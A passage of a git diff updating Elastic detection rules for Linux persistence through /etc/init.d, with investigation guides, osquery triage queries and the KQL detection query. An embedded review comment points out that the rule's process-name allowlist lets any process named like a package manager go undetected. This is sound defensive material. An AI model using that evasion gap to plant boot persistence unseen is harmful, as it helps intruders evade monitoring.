If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n",
 "references": [
 "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json
index e6d25fa8647..7c7a7130b2b 100644
--- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json
@@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json index eddf6181c8c..de6ddc71024 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json 
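Review bot: The `not process.name : (...)` exclusion in the `query` context line of this hunk lists `\"rpm\"` twice (`... \"rpm\" or \"dnf\" ... \"yum\" or \n\"rpm\" ...`), which is harmless to the query but reads as an editing leftover; the same duplicate is carried in the `@@ -17,7 +17,7 @@` hunk of `474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json`. Versioned rule files like these are presumably frozen snapshots, so the cleanup belongs in the rule's source, but it is worth confirming the latest revision does not carry it forward. On the detection logic itself, the allowlist is keyed on `process.name` alone, so any process that merely carries a package-manager name is excluded regardless of where it runs from; pairing the exclusion with a `process.executable` path constraint would narrow that gap, and the guide's False Positive Analysis section could state that exceptions should combine name and executable path rather than name alone. The changed `note` line only replaces `\u003e` escapes with literal `>`, which does not alter the rendered guide.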
@@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json index 3f454de3bab..5ed3325713f 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json 
@@ -17,7 +17,7 @@
 "file.path",
 "process.name"
 ],
